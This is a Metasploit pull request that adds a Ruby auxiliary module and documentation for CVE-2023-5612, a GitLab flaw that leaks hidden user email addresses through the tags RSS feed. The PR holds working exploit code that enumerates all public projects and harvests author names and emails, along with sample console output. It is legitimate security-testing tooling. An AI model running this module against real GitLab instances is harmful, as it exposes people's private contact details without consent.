### PR TITLE
module for gitlab public email disclosure CVE-2023-5612

### DIFF
--- a/documentation/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.md
+++ b/documentation/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.md
@@ -4,17 +4,16 @@ Information disclosure affecting all versions of GitLab
 before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1
 by sending a GET request to the project URI and appending "-/tags"
 
-## Verification Steps
-
 ### Docker installation instructions can be found here:
 
 https://docs.gitlab.com/ee/install/docker.html
 
-Once installed, create a project. Once the projecte is
+Once installed, create a project. Once the project is
 created, add a new tag by expanding the Code menu item
 on the left, then selecting Tags. Then click on the 
 New Tag button in the top right corner.
 
+## Verification Steps
 
 1. Install the application
 1. Start msfconsole
@@ -24,9 +23,11 @@ New Tag button in the top right corner.
 1. You should receive output with user names and email addresses assocaited with project tags
 
 ## Options
-By default the `TARGETPROJECT` option is empty. This will gather information for ALL PUBLICLY ACCESSIBLE PROJECTS. If you
-know the specific project you would like to target, you would need to set that here.
 
+### TARGETPROJECT
+
+This will gather information for ALL PUBLICLY ACCESSIBLE PROJECTS. IF you know the specific project you would
+like to target, you would need to set that here.
 
 ## Scenarios
 ### Scrape all Workspaces/Projects

--- a/documentation/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.md
+++ b/documentation/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.md
@@ -1,0 +1,71 @@
+## Vulnerable Application
+
+Information disclosure affecting all versions of GitLab
+before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1
+by sending a GET request to the project URI and appending "-/tags"
+
+## Verification Steps
+
+### Docker installation instructions can be found here:
+
+https://docs.gitlab.com/ee/install/docker.html
+
+Once installed, create a project. Once the projecte is
+created, add a new tag by expanding the Code menu item
+on the left, then selecting Tags. Then click on the 
+New Tag button in the top right corner.
+
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `set RHOSTS [IP]`
+1. Do: `run`
+1. You should receive output with user names and email addresses assocaited with project tags
+
+## Options
+By default the `TARGETPROJECT` option is empty. This will gather information for ALL PUBLICLY ACCESSIBLE PROJECTS. If you
+know the specific project you would like to target, you would need to set that here.
+
+
+## Scenarios
+### Scrape all Workspaces/Projects
+```
+msf6 > use auxiliary/gather/gitlab_tags_rss_info_disclosure 
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > run
+[*] Running module against 127.0.0.1
+
+[+] [2024.02.09-11:18:23] Scraping ALL projects...
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: Workspace1/Project1
+[+] [2024.02.09-11:18:23] Output saved to /root/.msf4/loot/20240209111823_default_127.0.0.1_gitlab.RSS.info__010524.xml
+[+] [2024.02.09-11:18:23] name: john doe
+[+] [2024.02.09-11:18:23] e-mail: johndoe@example.com
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: Workspace1/Project2
+[+] [2024.02.09-11:18:23] Output saved to /root/.msf4/loot/20240209111823_default_127.0.0.1_gitlab.RSS.info__822263.xml
+[+] [2024.02.09-11:18:23] name: janedoe
+[+] [2024.02.09-11:18:23] e-mail: janedoe@example.com
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: ws2/proj1
+[-] [2024.02.09-11:18:23] No tags or authors found
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: ws3/proj1
+[-] [2024.02.09-11:18:23] No tags or authors found
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: ws3/proj2
+[-] [2024.02.09-11:18:23] No tags or authors found
+[*] Auxiliary module execution completed
+```
+### Specify Project
+```
+msf6 > use auxiliary/gather/gitlab_tags_rss_info_disclosure 
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > set RHOSTS 127.0.0.1     
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > set TARGETPROJECT Workspace1/Project1
+TARGETPROJECT => Workspace1/Project1
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > run
+[*] Running module against 127.0.0.1
+
+[*] [2024.02.09-11:44:43] Check RSS tags feed for: Workspace1/Project1
+[+] [2024.02.09-11:44:43] Output saved to /root/.msf4/loot/20240209114443_default_127.0.0.1_gitlab.RSS.info__390983.xml
+[+] [2024.02.09-11:44:43] name: janedoe
+[+] [2024.02.09-11:44:43] e-mail: janedoe@example.com
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
+++ b/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status('Check RSS tags feed for: ' + tags)
 
     # Tag needs to be lower case, so...
-    tags.sub!(/^\//, '') if tags.start_with?("/")
+    tags.sub!(%r{^/}, '') if tags.start_with?('/')
     tags = "#{tags.split('/')[0]}/#{tags.split('/')[1].downcase}"
 
     res = send_request_cgi(

--- a/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
+++ b/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
           'erruquill' # HackerOne Bug Bounty, analysis
         ],
         'References' => [
-          [ 'URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/428441' ],
+          [ 'URL', 'https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/' ],
           [ 'URL', 'https://hackerone.com/reports/2208790'],
           [ 'CVE', '2023-5612']
         ],
@@ -54,6 +54,8 @@ class MetasploitModule < Msf::Auxiliary
       'uri' => normalize_uri(target_uri.path, tags, '-', 'tags'),
       'method' => 'GET', 'vars_get' => { 'format' => 'atom' }
     )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
 
     if res.code == 200
       xml_res = res.get_xml_document

--- a/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
+++ b/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
@@ -48,6 +48,7 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status('Check RSS tags feed for: ' + tags)
 
     # Tag needs to be lower case, so...
+    tags.sub!(/^\//, '') if tags.start_with?("/")
     tags = "#{tags.split('/')[0]}/#{tags.split('/')[1].downcase}"
 
     res = send_request_cgi(

--- a/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
+++ b/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Auxiliary
       # so forks of projects may show duplicate email addresses.
       unique_emails = Set.new
 
-      authors = xml_res.xpath('//xmlns:author').each do |authors|
+      xml_res.xpath('//xmlns:author').each do |authors|
         email = authors.at_xpath('xmlns:email').text
         next if unique_emails.include?(email)
 
@@ -101,13 +101,13 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 200
 
-      j = res.get_json_document.each do |entry|
+      res.get_json_document.each do |entry|
         t = entry['path_with_namespace']
         get_contents(t)
       end
 
     else
-      get_contents("#{datastore['TARGETPROJECT']}")
+      get_contents(datastore['TARGETPROJECT'].to_s)
     end
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")

--- a/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
+++ b/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
@@ -44,14 +44,14 @@ class MetasploitModule < Msf::Auxiliary
     )
   end
 
-  def get_contents(t)
-    print_status('Check RSS tags feed for: ' + t)
+  def get_contents(tags)
+    print_status('Check RSS tags feed for: ' + tags)
 
     # Tag needs to be lower case, so...
-    t = t.split('/')[0] + '/' + t.split('/')[1].downcase
+    tags = tags.split('/')[0] + '/' + tags.split('/')[1].downcase
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, t, '-', 'tags'),
+      'uri' => normalize_uri(target_uri.path, tags, '-', 'tags'),
       'method' => 'GET', 'vars_get' => { 'format' => 'atom' }
     )
 
@@ -102,8 +102,8 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 200
 
       res.get_json_document.each do |entry|
-        t = entry['path_with_namespace']
-        get_contents(t)
+        tags = entry['path_with_namespace']
+        get_contents(tags)
       end
 
     else

--- a/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
+++ b/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
@@ -1,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GitLab Tags RSS feed email disclosure',
+        'Description' => %q{
+          An issue has been discovered in GitLab affecting all versions
+          before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1.
+          It is possible to read the user email address via tags feed
+          although the visibility in the user profile has been disabled.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'n00bhaxor', # msf module
+          'erruquill' # HackerOne Bug Bounty, analysis
+        ],
+        'References' => [
+          [ 'URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/428441' ],
+          [ 'URL', 'https://hackerone.com/reports/2208790'],
+          [ 'CVE', '2023-5612']
+        ],
+        'DisclosureDate' => '2024-01-25',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the GitLab Application', '/']),
+        OptString.new('TARGETPROJECT', [ false, 'Workspace and project to target', nil])
+      ]
+    )
+  end
+
+  def get_contents(t)
+    print_status('Check RSS tags feed for: ' + t)
+
+    # Tag needs to be lower case, so...
+    t = t.split('/')[0] + '/' + t.split('/')[1].downcase
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, t, '-', 'tags'),
+      'method' => 'GET', 'vars_get' => { 'format' => 'atom' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 200 || res.code == 301
+
+    xml_res = res.get_xml_document
+
+    # Check to see if there are any tags with authors
+    author_element = 'author'
+    not_found = xml_res.xpath("//xmlns:#{author_element}").empty?
+    if not_found
+      print_bad('No tags or authors found')
+    else
+      loot_path = store_loot('gitlab.RSS.info_disclosure', 'application/xml', datastore['RHOST'], xml_res, 'tag_author_info.xml')
+      print_good("Output saved to #{loot_path}")
+
+      # Initialze an empty set so we can dedupe authors based on email address
+      # This only dedupes within a project, not the entirety of Gitlab,
+      # so forks of projects may show duplicate email addresses.
+      unique_emails = Set.new
+
+      authors = xml_res.xpath('//xmlns:author').each do |authors|
+        email = authors.at_xpath('xmlns:email').text
+        next if unique_emails.include?(email)
+
+        name = authors.at_xpath('xmlns:name').text
+        print_good("name: #{name}")
+        print_good("e-mail: #{email}")
+        unique_emails << email
+      end
+    end
+  end
+
+  def run
+    if datastore['TARGETPROJECT'].nil?
+      print_good('Scraping ALL projects...')
+      request = {
+        'uri' => normalize_uri(target_uri.path, '/api/v4/projects'),
+        'method' => 'GET', 'vars_get' => {
+          'output_mode' => 'json'
+        }
+      }
+
+      res = send_request_cgi(request)
+
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 200
+
+      j = res.get_json_document.each do |entry|
+        t = entry['path_with_namespace']
+        get_contents(t)
+      end
+
+    else
+      get_contents("#{datastore['TARGETPROJECT']}")
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+end


### PR DESCRIPTION
Add a module to exploit CVE-2023-5612, public email disclosure in project tags in RSS feed.

## Verification

- [ ] Install the application. Docker installation instructions can be found here: https://docs.gitlab.com/ee/install/docker.html
- [ ] Create a new project and a tag within that project.
- [ ] Start `msfconsole`
- [ ] `use /auxiliary/gather/gitlab_tags_rss_feed_email_disclosure`
- [ ] `set RHOSTS [IP]`
- [ ] `run`
- [ ] You should receive output with user names and email addresses associated with project tags